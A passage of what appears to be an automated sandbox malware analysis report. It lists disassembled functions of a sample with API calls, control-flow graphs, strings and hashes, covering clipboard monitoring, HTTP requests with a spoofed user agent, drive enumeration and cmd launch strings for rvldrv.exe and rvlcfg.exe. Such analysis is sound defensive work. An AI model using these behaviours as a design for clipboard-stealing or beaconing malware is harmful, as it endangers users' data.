                                                                                                                                    • Associated: 00000011.00000002.1976047598.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_17_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Internet$CloseHandleHttpRequest$Open$ConnectCrackFileHeadersReadSendmemcpymemset
                                                                                                                                    • String ID: <$Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x)$POST
                                                                                                                                    • API String ID: 2761394606-2217117414
                                                                                                                                    • Opcode ID: 48caadfad9c7ab3af6f27c5da5da9c09f3769a6c19190aa75f6955b0391b6548
                                                                                                                                    • Instruction ID: ef1808732392904e9289ee89b59ca4b2c464bfe5f798c53c6f33b23f739279b9
                                                                                                                                    • Opcode Fuzzy Hash: 48caadfad9c7ab3af6f27c5da5da9c09f3769a6c19190aa75f6955b0391b6548
                                                                                                                                    • Instruction Fuzzy Hash: 40510AB5A01228ABDB36CF54DC54BDA73BCAB48705F1081E9B50DAA280D7B96FC4CF54
                                                                                                                                    Function 004059B0 Relevance: 25.7, APIs: 17, Instructions: 186clipboardregistryCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 669 4059b0-4059d2 GetWindowLongW 670 4059d4-4059db 669->670 671 4059f6-4059fd 669->671 672 4059e1-4059e5 670->672 673 405a67-405a78 IsClipboardFormatAvailable 670->673 674 405a26-405a2c 671->674 675 4059ff 671->675 678 405a04-405a21 SetClipboardViewer SetWindowLongW 672->678 679 4059e7-4059eb 672->679 676 405a83-405a8d IsClipboardFormatAvailable 673->676 677 405a7a-405a81 673->677 681 405a46-405a4a 674->681 682 405a2e-405a44 SetWindowLongW 674->682 680 405be4-405bfd DefWindowProcA 675->680 684 405a98-405aa2 IsClipboardFormatAvailable 676->684 685 405a8f-405a96 676->685 683 405aab-405aaf 677->683 678->680 686 4059f1 679->686 687 405b9d-405bde RegisterRawInputDevices ChangeClipboardChain 679->687 688 405a62 681->688 689 405a4c-405a5c SendMessageA 681->689 682->688 691 405ab5-405abf OpenClipboard 683->691 692 405b7f-405b83 683->692 684->683 690 405aa4 684->690 685->683 686->680 687->680 688->680 689->688 690->683 691->692 693 405ac5-405ad6 GetClipboardData 691->693 694 405b85-405b95 SendMessageA 692->694 695 405b9b 692->695 696 405ad8 693->696 697 405add-405aee GlobalLock 693->697 694->695 695->680 696->680 698 405af0 697->698 699 405af5-405b06 697->699 698->680 700 405b08-405b0c 699->700 701 405b29-405b3c call 40d250 699->701 703 405b3e-405b4e call 4057f0 700->703 704 405b0e-405b12 700->704 710 405b51-405b65 GlobalUnlock CloseClipboard 701->710 703->710 707 405b14 704->707 708 405b16-405b27 call 405680 704->708 707->710 708->710 710->692 713 405b67-405b7c call 404970 call 40ab60 710->713 713->692
                                                                                                                                    APIs
                                                                                                                                    • GetWindowLongW.USER32(?,000000EB), ref: 004059BC
                                                                                                                                    • SetClipboardViewer.USER32(?), ref: 00405A08
                                                                                                                                    • SetWindowLongW.USER32(?,000000EB,?), ref: 00405A1B
                                                                                                                                    • IsClipboardFormatAvailable.USER32(0000000D), ref: 00405A70
                                                                                                                                    • OpenClipboard.USER32(00000000), ref: 00405AB7
                                                                                                                                    • GetClipboardData.USER32(00000000), ref: 00405AC9
                                                                                                                                    • RegisterRawInputDevices.USER32(?,00000001,0000000C), ref: 00405BD0
                                                                                                                                    • ChangeClipboardChain.USER32(?,?), ref: 00405BDE
                                                                                                                                    • DefWindowProcA.USER32(?,?,?,?), ref: 00405BF4
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000011.00000002.1975984094.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000011.00000002.1975956652.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000011.00000002.1976001209.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000011.00000002.1976047598.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_17_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Clipboard$Window$Long$AvailableChainChangeDataDevicesFormatInputOpenProcRegisterViewer
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3549449529-0
                                                                                                                                    • Opcode ID: 2f0b22ba391b773d4c45c64ac6dadd066d7720e91bacc99fadb97576ecf3cd51
                                                                                                                                    • Instruction ID: 96d86bc259bd628418629a5c2f452591d45261003c5ffeff5fe086a58ca8b5ae
                                                                                                                                    • Opcode Fuzzy Hash: 2f0b22ba391b773d4c45c64ac6dadd066d7720e91bacc99fadb97576ecf3cd51
                                                                                                                                    • Instruction Fuzzy Hash: EB711C75A00608EFDF14DFA4D988BEF77B4EB48300F14856AE506B7290D779AA40CF69
                                                                                                                                    Function 00401600 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 96networkCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    APIs
                                                                                                                                    • EnterCriticalSection.KERNEL32(?,00000000,?,?,004021A5,00000000), ref: 0040161F
                                                                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 0040164B
                                                                                                                                    • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00401663
                                                                                                                                    • InterlockedIncrement.KERNEL32(?), ref: 00401691
                                                                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 004016A1
                                                                                                                                    • LeaveCriticalSection.KERNEL32(?,?,?,004021A5,00000000), ref: 004016B9
                                                                                                                                    • SetEvent.KERNEL32(?,?,?,004021A5,00000000), ref: 004016C3
                                                                                                                                    • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000,00000000,?,?,004021A5,00000000), ref: 004016E0
                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,004021A5,00000000), ref: 00401709
                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,004021A5,00000000), ref: 0040170F
                                                                                                                                    • WSACloseEvent.WS2_32(?), ref: 00401715
                                                                                                                                    • DeleteCriticalSection.KERNEL32(?,?,?,?,004021A5,00000000), ref: 0040172B
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000011.00000002.1975984094.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000011.00000002.1975956652.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000011.00000002.1976001209.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000011.00000002.1976047598.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_17_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Interlocked$CloseCriticalSection$DecrementEventHandle$CompletionDeleteEnterExchangeIncrementLeavePostQueuedStatus
                                                                                                                                    • String ID: PCOI$ilci
                                                                                                                                    • API String ID: 2403999931-3762367603
                                                                                                                                    • Opcode ID: 8d3037cf696ecd8756279fad8891fdfc713d08fe7f166539a7d0865b035c0410
                                                                                                                                    • Instruction ID: 00719830d96ac068de130eecfd85e1b44ef6fd60ec2c55820453df0d9b8f54e2
                                                                                                                                    • Opcode Fuzzy Hash: 8d3037cf696ecd8756279fad8891fdfc713d08fe7f166539a7d0865b035c0410
                                                                                                                                    • Instruction Fuzzy Hash: B731A671900705ABC710AF70EC48B97B7B8BF09300F048A2AE569A7691D779F894CB98
                                                                                                                                    Function 004058C0 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 73windowsleepregistryCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    APIs
                                                                                                                                    • memset.NTDLL ref: 004058D8
                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 004058F0
                                                                                                                                    • Sleep.KERNEL32(00000001), ref: 00405904
                                                                                                                                    • GetTickCount.KERNEL32 ref: 0040590A
                                                                                                                                    • GetTickCount.KERNEL32 ref: 00405913
                                                                                                                                    • wsprintfW.USER32 ref: 00405926
                                                                                                                                    • RegisterClassExW.USER32(00000030), ref: 00405933
                                                                                                                                    • CreateWindowExW.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,?,00000000), ref: 0040595C
                                                                                                                                    • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00405977
                                                                                                                                    • TranslateMessage.USER32(?), ref: 00405985
                                                                                                                                    • DispatchMessageA.USER32(?), ref: 0040598F
                                                                                                                                    • ExitThread.KERNEL32 ref: 004059A1
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000011.00000002.1975984094.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000011.00000002.1975956652.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000011.00000002.1976001209.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000011.00000002.1976047598.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_17_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Message$CountTick$ClassCreateDispatchExitHandleModuleRegisterSleepThreadTranslateWindowmemsetwsprintf
                                                                                                                                    • String ID: %x%X$0
                                                                                                                                    • API String ID: 716646876-225668902
                                                                                                                                    • Opcode ID: 03a63f419c221d19dc1f4a22be05731f57d92fe9a42c49428073284f968a398b
                                                                                                                                    • Instruction ID: bd9536bbadbf21864e97b89de5b907373c0f6f38ddabaab6f1c3dd09ba998754
                                                                                                                                    • Opcode Fuzzy Hash: 03a63f419c221d19dc1f4a22be05731f57d92fe9a42c49428073284f968a398b
                                                                                                                                    • Instruction Fuzzy Hash: C7211AB1940308FBEB109BA0DD49FEE7B78EB04711F14852AF601BA1D0DBB99544CF69
                                                                                                                                    Function 0040E640 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 130networkfileCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 765 40e640-40e6db memset InternetCrackUrlA InternetOpenA 766 40e6e1-40e714 InternetConnectA 765->766 767 40e857-40e860 765->767 768 40e84a-40e851 InternetCloseHandle 766->768 769 40e71a-40e74a HttpOpenRequestA 766->769 768->767 770 40e750-40e767 HttpSendRequestA 769->770 771 40e83d-40e844 InternetCloseHandle 769->771 772 40e830-40e837 InternetCloseHandle 770->772 773 40e76d-40e771 770->773 771->768 772->771 774 40e826 773->774 775 40e777 773->775 774->772 776 40e781-40e788 775->776 777 40e819-40e824 776->777 778 40e78e-40e7b0 InternetReadFile 776->778 777->772 779 40e7b2-40e7b9 778->779 780 40e7bb 778->780 779->780 781 40e7bd-40e814 call 40a990 memcpy 779->781 780->777 781->776
                                                                                                                                    APIs
                                                                                                                                    • memset.NTDLL ref: 0040E668
                                                                                                                                    • InternetCrackUrlA.WININET(0040E119,00000000,10000000,0000003C), ref: 0040E6B8
                                                                                                                                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040E6C8
                                                                                                                                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040E701
                                                                                                                                    • HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,00000000,00000000), ref: 0040E737
                                                                                                                                    • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040E75F
                                                                                                                                    • InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040E7A8
                                                                                                                                    • memcpy.NTDLL(00000000,?,00000000), ref: 0040E7FA
                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040E837
                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040E844
                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040E851
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000011.00000002.1975984094.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000011.00000002.1975956652.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000011.00000002.1976001209.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000011.00000002.1976047598.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_17_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Internet$CloseHandle$HttpOpenRequest$ConnectCrackFileReadSendmemcpymemset
                                                                                                                                    • String ID: <$GET
                                                                                                                                    • API String ID: 1205665004-427699995
                                                                                                                                    • Opcode ID: 74e573df251a3fdd9775996cb884078f57aebd0a6693bdda84868dee8850155f
                                                                                                                                    • Instruction ID: bd69c55cfb2b9f93b8bf7ceaaaaaf86fc3309545456039a657a23fe3286800e0
                                                                                                                                    • Opcode Fuzzy Hash: 74e573df251a3fdd9775996cb884078f57aebd0a6693bdda84868dee8850155f
                                                                                                                                    • Instruction Fuzzy Hash: F75109B1A41228ABDB36DB50CC55BE973BCAB44705F0484E9E60DAA2C0D7B96BC4CF54
                                                                                                                                    Function 00406F70 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 106sleepthreadCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    APIs
                                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 00406F7E
                                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,00415DB8,00000104), ref: 00406F90
                                                                                                                                      • Part of subcall function 0040F1F0: CreateFileW.KERNEL32(00406FA0,80000000,00000001,00000000,00000003,00000000,00000000,00406FA0), ref: 0040F210
                                                                                                                                      • Part of subcall function 0040F1F0: GetFileSize.KERNEL32(000000FF,00000000), ref: 0040F225
                                                                                                                                      • Part of subcall function 0040F1F0: CloseHandle.KERNEL32(000000FF), ref: 0040F232
                                                                                                                                    • ExitThread.KERNEL32 ref: 004070FA
                                                                                                                                      • Part of subcall function 004063E0: GetLogicalDrives.KERNEL32 ref: 004063E6
                                                                                                                                      • Part of subcall function 004063E0: RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,00000000,00020019,?), ref: 00406434
                                                                                                                                      • Part of subcall function 004063E0: RegQueryValueExW.ADVAPI32(?,NoDrives,00000000,00000000,00000000,00000004), ref: 00406461
                                                                                                                                      • Part of subcall function 004063E0: RegCloseKey.ADVAPI32(?), ref: 0040647E
                                                                                                                                    • Sleep.KERNEL32(000007D0), ref: 004070ED
                                                                                                                                      • Part of subcall function 00406300: lstrcpyW.KERNEL32(?,?,?,?,00000019), ref: 00406353
                                                                                                                                    • GetVolumeInformationW.KERNEL32(?,?,00000105,00000000,00000000,?,00000000,00000000), ref: 0040702F
                                                                                                                                    • GetDiskFreeSpaceExW.KERNEL32(?,00000000,?,00000000), ref: 00407044
                                                                                                                                    • _aulldiv.NTDLL(?,?,40000000,00000000), ref: 0040705F
                                                                                                                                    • wsprintfW.USER32 ref: 00407072
                                                                                                                                    • wsprintfW.USER32 ref: 00407092
                                                                                                                                    • wsprintfW.USER32 ref: 004070B5
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000011.00000002.1975984094.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000011.00000002.1975956652.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000011.00000002.1976001209.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000011.00000002.1976047598.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_17_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Filewsprintf$CloseSleep$CreateDiskDrivesExitFreeHandleInformationLogicalModuleNameOpenQuerySizeSpaceThreadValueVolume_aulldivlstrcpy
                                                                                                                                    • String ID: (%dGB)$%s%s$Unnamed volume
                                                                                                                                    • API String ID: 1650488544-2117135753
                                                                                                                                    • Opcode ID: 36835f4b582c7264fa9310f82983a243ead37fe316eb445b52cb330bcd55ef35
                                                                                                                                    • Instruction ID: b797a4b926279b24144ff746e96c568fb56fd9e530b7e1178aba5a8e6206bca3
                                                                                                                                    • Opcode Fuzzy Hash: 36835f4b582c7264fa9310f82983a243ead37fe316eb445b52cb330bcd55ef35
                                                                                                                                    • Instruction Fuzzy Hash: 244174B1D00214BBEB64DB94DC45FEE7779BB48700F1085A6F20AB61D0DA785B84CF6A
                                                                                                                                    Function 0040F240 Relevance: 16.6, APIs: 11, Instructions: 144fileCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040F272
                                                                                                                                    • CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 0040F293
                                                                                                                                    • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 0040F2B2
                                                                                                                                    • GetFileSize.KERNEL32(000000FF,00000000), ref: 0040F2CB
                                                                                                                                    • memcmp.NTDLL ref: 0040F35D
                                                                                                                                    • UnmapViewOfFile.KERNEL32(00000000), ref: 0040F380
                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0040F38A
                                                                                                                                    • CloseHandle.KERNEL32(000000FF), ref: 0040F394
                                                                                                                                    • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040F3B3
                                                                                                                                    • WriteFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 0040F3D8
                                                                                                                                    • CloseHandle.KERNEL32(000000FF), ref: 0040F3E2
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000011.00000002.1975984094.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000011.00000002.1975956652.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000011.00000002.1976001209.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000011.00000002.1976047598.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_17_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: File$CloseCreateHandle$View$MappingSizeUnmapWritememcmp
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3902698870-0
                                                                                                                                    • Opcode ID: 397832f4b3c545954de9817604727ce70a7a27c44a74f567f7741af6b4247064
                                                                                                                                    • Instruction ID: 91565a6fedc79cda49cfd97bae5198494bb6489b7e374c7f74ac69d8e3e388a5
                                                                                                                                    • Opcode Fuzzy Hash: 397832f4b3c545954de9817604727ce70a7a27c44a74f567f7741af6b4247064
                                                                                                                                    • Instruction Fuzzy Hash: 75514BB4E40308FBDB24DBA4CC49F9EB774AB48304F108569F611B72C0D7B9AA44CB98
                                                                                                                                    Function 0040DD50 Relevance: 16.6, APIs: 11, Instructions: 95threadsleepsynchronizationCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetCurrentThread.KERNEL32 ref: 0040DD56
                                                                                                                                    • GetThreadPriority.KERNEL32(00000000,?,?,?,00408480,?,000000FF), ref: 0040DD5D
                                                                                                                                    • GetCurrentThread.KERNEL32 ref: 0040DD68
                                                                                                                                    • SetThreadPriority.KERNEL32(00000000,?,?,?,00408480,?,000000FF), ref: 0040DD6F
                                                                                                                                    • InterlockedExchangeAdd.KERNEL32(00408480,00000000), ref: 0040DD92
                                                                                                                                    • EnterCriticalSection.KERNEL32(000000FB), ref: 0040DDC7
                                                                                                                                    • WaitForSingleObject.KERNEL32(000000FF,00000000), ref: 0040DE12
                                                                                                                                    • LeaveCriticalSection.KERNEL32(000000FB), ref: 0040DE2E
                                                                                                                                    • Sleep.KERNEL32(00000001), ref: 0040DE5E
                                                                                                                                    • GetCurrentThread.KERNEL32 ref: 0040DE6D
                                                                                                                                    • SetThreadPriority.KERNEL32(00000000,?,?,?,00408480), ref: 0040DE74
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000011.00000002.1975984094.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000011.00000002.1975956652.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000011.00000002.1976001209.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000011.00000002.1976047598.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_17_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Thread$CurrentPriority$CriticalSection$EnterExchangeInterlockedLeaveObjectSingleSleepWait
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3862671961-0
                                                                                                                                    • Opcode ID: 5618e667e755a89869c685173e38bf799e2d1f6c3c7819217eae43ff0fa2d7e3
                                                                                                                                    • Instruction ID: 15ec6ce41066bd2df298828df26a4308ea05a03792f046612c1f6ffbd780898a
                                                                                                                                    • Opcode Fuzzy Hash: 5618e667e755a89869c685173e38bf799e2d1f6c3c7819217eae43ff0fa2d7e3
                                                                                                                                    • Instruction Fuzzy Hash: 1B412C74E00209DBDB04DFE4D844BAEBB71FF54315F108169E916AB381D7789A84CF99
                                                                                                                                    Function 0040F400 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 60sleepprocessCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • memset.NTDLL ref: 0040F40E
                                                                                                                                    • memset.NTDLL ref: 0040F41E
                                                                                                                                    • CreateProcessW.KERNEL32(00000000,00407D11,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 0040F457
                                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 0040F467
                                                                                                                                    • ShellExecuteW.SHELL32(00000000,open,00407D11,00000000,00000000,00000000), ref: 0040F482
                                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 0040F49C
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000011.00000002.1975984094.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000011.00000002.1975956652.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000011.00000002.1976001209.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000011.00000002.1976047598.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_17_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Sleepmemset$CreateExecuteProcessShell
                                                                                                                                    • String ID: $D$open
                                                                                                                                    • API String ID: 3787208655-2182757814
                                                                                                                                    • Opcode ID: 86490e0f5312193f556b58b4939b15177e1386a4ac5e4b01298813237b5ed1b8
                                                                                                                                    • Instruction ID: 03d024a0b9a73c413bf1553ab10d0ee3a8ab15297eec0ef6a9417e1ec1830951
                                                                                                                                    • Opcode Fuzzy Hash: 86490e0f5312193f556b58b4939b15177e1386a4ac5e4b01298813237b5ed1b8
                                                                                                                                    • Instruction Fuzzy Hash: ED112B71A80308BAEB209B90CD46FDE7778AB14B10F204135FA047E2C0D6B9AA448759
                                                                                                                                    Function 00406660 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 106comCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • CoInitialize.OLE32(00000000), ref: 0040666B
                                                                                                                                    • CoCreateInstance.OLE32(00413030,00000000,00000001,00413010,00000008), ref: 00406683
                                                                                                                                    • wsprintfW.USER32 ref: 004066C4
                                                                                                                                    • wsprintfW.USER32 ref: 004066E5
                                                                                                                                    Strings
                                                                                                                                    • /c start %s & start %s\rvldrv.exe & start %s\rvlcfg.exe, xrefs: 004066B8
                                                                                                                                    • %comspec%, xrefs: 004066EE
                                                                                                                                    • cl@, xrefs: 004066A0
                                                                                                                                    • /c start %s & start %s\rvlcfg.exe, xrefs: 004066D9
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000011.00000002.1975984094.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000011.00000002.1975956652.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000011.00000002.1976001209.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000011.00000002.1976047598.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_17_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: wsprintf$CreateInitializeInstance
                                                                                                                                    • String ID: %comspec%$/c start %s & start %s\rvlcfg.exe$/c start %s & start %s\rvldrv.exe & start %s\rvlcfg.exe$cl@
                                                                                                                                    • API String ID: 1147330536-497122036
                                                                                                                                    • Opcode ID: eee1a2fc8572b98f6c40a5fc3c9db374d26e8a3e47ee9b9990b59bb952fb1ff2
                                                                                                                                    • Instruction ID: e126a915917d584c7bd6e3cca15df18ca7e9be12ab45cc4692bb8e15b90f0fb7
                                                                                                                                    • Opcode Fuzzy Hash: eee1a2fc8572b98f6c40a5fc3c9db374d26e8a3e47ee9b9990b59bb952fb1ff2
                                                                                                                                    • Instruction Fuzzy Hash: 67411D75A40208AFC704DF98C885FDEB7B5AF88704F208199F515A72A5C675AE81CB54
                                                                                                                                    Function 00401D60 Relevance: 13.6, APIs: 9, Instructions: 141COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • InterlockedExchange.KERNEL32(?,00000000), ref: 00401D86
                                                                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 00401DB0
                                                                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 00401DC3
                                                                                                                                    • InterlockedExchangeAdd.KERNEL32(?,?), ref: 00401DD4
                                                                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 00401E5B
                                                                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 00401EF6
                                                                                                                                    • setsockopt.WS2_32 ref: 00401F2C
                                                                                                                                    • closesocket.WS2_32(?), ref: 00401F39
                                                                                                                                      • Part of subcall function 0040DF20: NtQuerySystemTime.NTDLL(0040BD65), ref: 0040DF2A
                                                                                                                                      • Part of subcall function 0040DF20: RtlTimeToSecondsSince1980.NTDLL(0040BD65,?), ref: 0040DF38
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000011.00000002.1975984094.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000011.00000002.1975956652.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000011.00000002.1976001209.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000011.00000002.1976047598.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_17_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Interlocked$Decrement$ExchangeTime$QuerySecondsSince1980Systemclosesocketsetsockopt
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 671207744-0
                                                                                                                                    • Opcode ID: 8dc138b45ca20bf30cfdef2e37b67658010477f0f0075654919bb451a9b4aa4a
                                                                                                                                    • Instruction ID: f2cbb4ded8662be063e38a6044f3a63d93470e371ff4fbf655dea468244fd3f8
                                                                                                                                    • Opcode Fuzzy Hash: 8dc138b45ca20bf30cfdef2e37b67658010477f0f0075654919bb451a9b4aa4a
